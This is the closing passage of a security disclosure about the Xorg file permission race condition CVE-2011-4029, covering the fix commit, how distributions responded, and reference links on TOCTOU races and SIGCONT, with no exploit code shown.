A fix for this vulnerability is available and will be included in xserver 1.11.2 and xserver 1.12. 
http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4

Some distros released new Xorg packages (Ubuntu, Gentoo), while others (like Debian) judge this a non-critical issue: http://security-tracker.debian.org/tracker/CVE-2011-4029

Footnotes & links
-----------------

[1] https://www.owasp.org/index.php/File_Access_Race_Condition:_TOCTOU
[2] http://en.wikipedia.org/wiki/SIGCONT "SIGCONT is the signal sent to restart a process previously paused by the SIGSTOP signal".

Source: Full Disclosure: Xorg file permission change PoC (CVE-2011-4029)

PS: "At this time (26/10/2010)" is presumably meant to be 2011.